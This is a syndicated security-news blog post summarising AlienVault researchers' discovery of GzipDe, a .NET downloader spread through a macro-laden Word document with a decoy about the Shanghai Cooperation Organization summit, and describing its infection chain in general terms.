A new piece of, what appears to be, highly targeted malware has been discovered by researchers at AlienVault. The new malware strain, dubbed GzipDe and most likely used in cyber-espionage campaigns, uses an article about the next Shanghai Cooperation Organization Summit.
More about the GzipDe Malware Operation
About a week ago, researchers detected a new malicious document targeting this area. Apparently, the document has included a piece of text taken from the report as a decoy.
AlienVault discovered a booby-trapped Word document on VirusTotal which was published by a user from Afghanistan. This is how they unearthed the malware.
The above-mentioned booby-trapped document (.doc file) is the first step of a multistage infection in which several servers and artifacts are deployed. The final stage of the malicious operation appears to be the installation of a Metasploit backdoor. However, this is not as interesting as the .NET downloader, which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
The malicious document tricked users into enabling macros, which once enabled executed a Visual Basic script. Then the script ran some PowerShell code, which subsequently downloaded a PE32 executable. The process ended with the actual malware — GZipDe – the researchers reported.
GZipDe appears to be coded in .NET, and it is designed to use “a custom encryption method to obfuscate process memory and evade antivirus detection.” Since the initial purpose of GzipDe is to act as a downloader, it means that the malware will download a more dangerous piece from a remote server. However, during the researchers’ investigation, the remote server was over which usually would end the analysis. However, it turned out Shodan, the IoT search engine, indexed the server and even recorded (Read more...)
*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum authored by Milena Dimitrova. Read the original post at: https://sensorstechforum.com/gzipde-malware-metasploit-backdoor/